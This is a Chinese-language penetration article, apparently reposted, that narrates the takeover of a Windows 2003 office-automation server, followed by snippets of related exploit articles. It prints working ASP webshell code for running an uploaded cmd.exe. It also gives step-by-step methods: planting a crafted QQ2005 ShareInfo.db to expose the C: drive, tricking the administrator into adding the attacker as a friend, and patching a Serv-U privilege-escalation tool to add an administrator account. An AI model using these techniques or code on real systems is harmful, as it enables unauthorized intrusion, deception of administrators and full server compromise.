用QQ文件共享漏洞彻底攻破Windows2003的坚固堡垒_漏洞研究

服务器上运行的第三方软件历来就被攻击者们看作是入侵目标系统的捷径。现在著名的腾讯QQ又被列入了这些捷径名单好在QQ并不是服务器必备的软件之一所以相信不会造成大范围的危机。文中遇到特殊情况虽然不多但大家还是应该遵照“可能的就应该防范”的原则做出相应防御。

一、在Windows2003中得到的webshell

此次渗透的目标是一台OA办公系统服务器。其操作系统新近升级到了Windows2003但OA仍存在asp文件上传漏洞所以webshell的取得并没有任何悬念。

阻碍是在权限提升时遇到的

登陆webshell后发现只能查看服务器的D盘对C盘不能进行任何访问webshell的提示是“没有权限”。这点早在意料之中因为wenshell只有guests组权限再加上win2003默认禁止了“Everyone"匿名用户及“Guest"组权限用户访问cmd.exe还造成了不能通过webshell运行cmd.exe。

唯一值得庆幸的是利用Webshell 可以对D盘存放有web虚拟目录各个子目录进行读写。这里除了web虚拟目录还有一些数据备份文件和一个腾讯QQ安装目录Tencent。

二、破解Serv-u的终极防范

Windows2003的种种默认安全配置展示了它强大的一面近一步提升现有权限似乎已不太可能直到我试图从系统入手向这台服务器发出FTP链接请求并看到Serv-u的banner时才觉得又有了一线希望。

前面提到由于Windows2003对cmd.exe的权限限制通过webshell方式不能运行cmd.exe这样的论断在2004年6期的防线的《构建Windows2003堡垒主机》一文也曾提到,但实践表明这并不正确通过webshell上传本地非2003系统中未受限制的cmd.exe文件到可执行目录再通过wscript组件同样能够通过webshell方式在Windows2003下获得相应权限的cmd.exe。结合nc.exe甚至还能得到一个guest组权限的命令行下的shell。

为此我对老兵的站长助手6.0做了一些改进增加了如下代码使其能够利用Wscript.shell组件运行本地上传的cmd.exe。

Function CmdShell()

If Request("SP")<>"" Then Session("ShellPath") = Request("SP")

ShellPath=Session("ShellPath")

if ShellPath="" Then ShellPath = "cmd.exe"

if Request("wscript")="yes" then

checked=" checked"

else

checked=""

end if

If Request("cmd")<>"" Then DefCmd = Request("cmd")

SI="<form method=post><input name=cmd Style=width:92% class=cmd value="&DefCmd&"><input type=submit value=运行>"

SI=SI&"<textarea Style=width:100%;height:500; class=cmd>"

If Request.Form("cmd")<>"" Then

if Request.Form("wscript")="yes" then

Set CM=CreateObject(ObT(1,0))

Set DD=CM.exec(ShellPath&" /c "&DefCmd)

aaa=DD.stdout.readall

SI=SI&aaa

else%>

<object runat=server id=ws scope=page classid="clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8"></object>

<object runat=server id=ws scope=page classid="clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"></object>

<object runat=server id=fso scope=page classid="clsid:0D43FE01-F093-11CF-8940-00A0C9054228"></object>

<%szTempFile = server.mappath("cmd.txt")

Call ws.Run (ShellPath&" /c " & DefCmd & " > " & szTempFile, 0, True)

Set fs = CreateObject("Scripting.FileSystemObject")

Set oFilelcx = fs.OpenTextFile (szTempFile, 1, False, 0)

aaa=Server.HTMLEncode(oFilelcx.ReadAll)

oFilelcx.Close

Call fso.DeleteFile(szTempFile, True)

SI=SI&aaa

end if

End If

SI=SI&chr(13)&"</textarea>"

SI=SI&"SHELL路径<input name=SP value="&ShellPath&" Style=width:70%>  "

SI=SI&"<input type=checkbox name=wscript value=yes"&checked&">WScript.Shell</form>"

Response.Write SI

End Function

利用时只需在shell路径中指定上传的cmd.exe路径再选中选项Wscript就能运行一些所需权限较低的系统命令如“net start”或者“netstat -an”依次运行这两个命令后Webshell回显了众多服务包括Serv-U FTP Server 活动端口列表中又出现了43958端口于是我自然想到了神通广大的Serv-u ftp Server本地权限提升漏洞。可真正用到的ftp本地权限提升工具在执行系统命令时却出现了530错误提示如图1。看来管理员或者其他人对Serv-u打上了布丁或者做了某些安全配置。为了知道究竟是怎样的安全配置上网查了查相关文章其中有一篇《Serv-u ftp Server 本地权限提升漏洞的终极防范》很受欢迎被多方转载作者是世外高人xiaolu。从错误提示看很有可能做了该文所谓的终极防范即对ServUDaemon.exe中默认的管理员或密码进行了修改。当然这只是假设只有将目标服务器上的ServUDaemon.exe下载下来看看具体配置才能确定但是安装有Serv-u的C盘禁止访问包括Programe files 目录权限提升再次受阻。

三、利用QQ2005共享文件漏洞将权限提升到底

再次翻了翻D盘又见到了那个很少能在服务器中看到的Tencent文件夹。查看whatsnew.txt。

得知QQ的版本是QQ2005 Beta1几个于相关文件的创建时间也说明网管最近在服务器上登陆过QQ。难道只能用QQ经过一番思索终于想到一个可以利用的QQ2005在文件共享功能上的一则漏洞。

该漏洞是随着QQ2005贺岁版新增功能出现的。可以将其危害描述为利用该漏洞攻击者可以浏览读取用户系统中的任意文件如sam文件、数据备份文件、敏感信息文件。影响系统安装有QQ2005贺岁版以上的所有Windows系列操作系统。

具体利用方法是先在本机登陆自己的QQ调出“QQ菜单”选择工具>设置共享指定C:\或者其他任何有利用价值的分区为共享文件完成后关闭QQ找到安装目录下的以QQ帐号命名的文件夹内“ShareInfo.db”文件。如图3所示。上传覆盖目标服务器上相同文件如D:\Tencent\QQ\654321\ShareInfo.db。这样当网管在服务器上登陆QQ时就会向好友开放C盘为共享目录。。

因为陌生人是不能共享对方文件所以还需要用社会工程学申请将管理员加为好友(理由当然越可信越好)。如果管理员通过请求服务器的C盘会以QQ共享文件目录的名义被共享原本不能通过WEBSHELL访问的ServUDaemon.exe文件就能被下载遇到阻碍的权限提升之路又能继续了。

当晚管理员就通过了申请将我添加为好友。珊瑚虫QQ上显示的IP正是目标服务器的IP于是下载了ServUDaemon.exe文件用UE打开后查找127.0.0.1发现默认配置下的内置帐户“LocalAdministrator”果然被改成了“LocalAdministruser”。这看起来是一个很“终极”的防御但提出该方法的xiaolu似乎没有进行攻防所须的换位思考就将其公布要知道攻击者只需知道修改后的配置并对本地权限提升利用工具进行相应的修改所谓的终极防御也就被攻破了。方法还是用UE打开脱了壳的serv-u本地权限提升利用工具将LocalAdministrator改为LocalAdministruser即可。

然后上传修改后的ftp2.exe在wscript.shell中执行D:\web\ftp2.exe “net user user password /add”后看看结果已经成功添加了一个用户。再把该用户加入administrators组和“Remote desktop users”组后登陆了目标服务器的远程桌面。

―――经过重重险阻终于彻底攻陷了这台坚固的Windows2003堡垒。

四、简单启示

可以看出和“服务越少越安全”一样服务器上运行的“第三方”越少越安全流行的PcAnywhere、VNC、Serv-U 权限提升和这里提出的利用QQ2005提升权限都是可以这样避免

时间: 2024-02-19 08:05:49

用QQ文件共享漏洞彻底攻破Windows2003的坚固堡垒_漏洞研究的相关文章

老兵新传-各种漏洞的利用和一些搜索参数_漏洞研究

各种漏洞的利用和一些搜索参数   说到漏洞,首先应该提到的就是动网的上传漏洞了.   "洞网"漏洞拉开了上传漏洞文件的序幕,其他系统的上   传漏洞接踵而来!   asp动网论坛漏洞分析   1.这个漏洞不算太严重,用过动网论坛的人都知道,发帖时直接写javascript会被过滤拆分,写http会自动加上链接,漏洞就在此,在这两个地方变通一下,把两个单词的某个字母换成编码形式,然后系统再对应地解码回字母,就达到了避免被过滤的目的.例子说明一下,在发帖时写入[img]javasx63ri

一些收集到的经典漏洞详解第1/2页_漏洞研究

☆carbo.dll☆   iCat Carbo服务器一个网络购物程序,它被 PC杂评为最好的网络购物软件.安全专家Mikael Johansson发现 iCat Carbo服务器版本 3.0.0.中存在一个漏洞,  这个漏洞让我们每个人查看系统中的任何文件在(除文件之外和一些特殊字符).   攻击方法:   提交这样的http请求 :   http://host/carbo.dll?icatcommand=file_to_view&catalogname=catalog   http会做如下回

文件上传漏洞在惠信中的应用_漏洞研究

近来大家为dvbbs的文件上传漏洞兴奋不已,想想在其他的系统里面能不能用的上呢?我就以惠信新闻系统来抛砖引玉吧!  惠信新闻系统3.1 windows2000+sp4  先看这句代码.admin_uploadfilesave.asp  ...............  Server.mappath(formPath&file.FileName)  ............................  保存时用路径+文件名+后缀名,那我们可以用dvbbs上的漏洞了,只不过我们改的是文件名(因

研究桃源留言本的漏洞_漏洞研究

桃源留言本是桃源工作室http://www.mytaoyuan.com/开发的一个asp留言系统.由于桃源留言本界面清新,功能强大,简洁适用,所以被一些大大小小的网站所采用,受到许多站长的好评.桃源留言本由原来的2.0版,升级到现在的3.0版.其官方网站也是3.0版.前段时间,我在入侵我们学校的网站的时候,发现了一个部门的网站上有这个留言本.于是引起了我对它的一番研究,我下载了各个版本的源代码,读了部分代码之后,发现漏洞还真不少.      一.上传漏洞     我在网上搜索的时候,发现已经有人

对QQ、msn等即时通讯软件(IM)的定性研究解密

此文资料分享出来想强调的是系统的设计逻辑,看到很多人都在这边那边大多特说,没有一个系统的设计逻辑,事实上心里面这些都要有谱的,相信qq也好.msn也好都会慢慢形成自己的体系的.而当今自己在做产品的时候,是不是仅仅觉得别人长了什么样,就去copy照样做成什么样呢?可谓有形没有形也是种杯具,更何况每个公司的战略不一样商业或利益侧重也不一样,这也需要产品经理去考虑和反思的. 一.引言 IM 主要被人们用于私人之间的日常交流和保持联系.除此以外,IM 被广泛地应用于办公领域,如讨论问题.协商工作日程等[

以DVRF(路由器漏洞靶机)为例解读JEB固件漏洞利用

本文讲的是以DVRF(路由器漏洞靶机)为例解读JEB固件漏洞利用, 在本文中,我将介绍JEB的MIPS反编译器是如何帮助你查找和利用嵌入式设备中的软件漏洞. DVRF DVRF(Damn_Vulnerable_Router_Firmware) 是一个基于路由器Linksys E1550的路由器固件,里面包含了开发者写的一些存在漏洞的二进制文件,可以在路由器中安装该固件进行安全测试. DVRF模拟了一个比较真实的环境,比较适合初学路由器漏洞挖掘,不过前提是对其他CPU架构(MIPS)有一个基本的了

phpwind管理权限泄露漏洞利用程序发布_漏洞研究

漏洞发布:http://www.80sec.com/  漏洞作者:jianxin@80sec.com  漏洞厂商: http://www.phpwind.com/ 本漏洞影响phpwind所有版本  漏洞危害:高  漏洞说明:phpwind是国内使用非常广泛的一款程序,由于在程序设计上存在错误,导致任何人可以取得前台管理员及斑主权限,做删除帖子等任意操作  利用方式:http://www.80sec.com有提供exploit  漏洞分析:由于phpwind论坛在设计上对数据库存储机制不了解,导

为什么要说又?OpenSSH又出漏洞了 这次是OpenSSH远程代码执行漏洞CVE-2016-10009

我去,OpenSSH今年这是第几次出漏洞了?安全加小编从绿盟科技的安全漏洞库上查了一下,这应该是2016年OpenSSH第8次出漏洞了,以往的OpenSSH漏洞依次如下 2016-10-31 OpenSSH远程拒绝服务漏洞(CVE-2016-8858) 2016-08-08 OpenSSH auth_password函数拒绝服务漏洞(CVE-2016-6515) 2016-05-04 OpenSSH do_setup_env函数权限提升漏洞(CVE-2015-8325) 2016-03-17 O

网站程序中非SI漏洞的利用_漏洞研究

Part I 前言  现在网上最流行的网站攻击手段,要数得上SQL Injection了,虽然SI技术易学易用,并且容易取得较大的权限,但因其风头实在太大,现在一般稍有点安全意识的程序员都会注意到这个问题,并且通过GET方法提交的数据会被服务器记录在案,而让网管很容易找到入侵者.  非SI类攻击相对来说获得的服务器操作权限不大,但对于以获得数据为目的的入侵还是很有用的.  Part II 方法介绍  常规的非SI类攻击有如下几种:  一. 跨站脚本攻击(XSS)  跨站脚本攻击不会直接对网站服务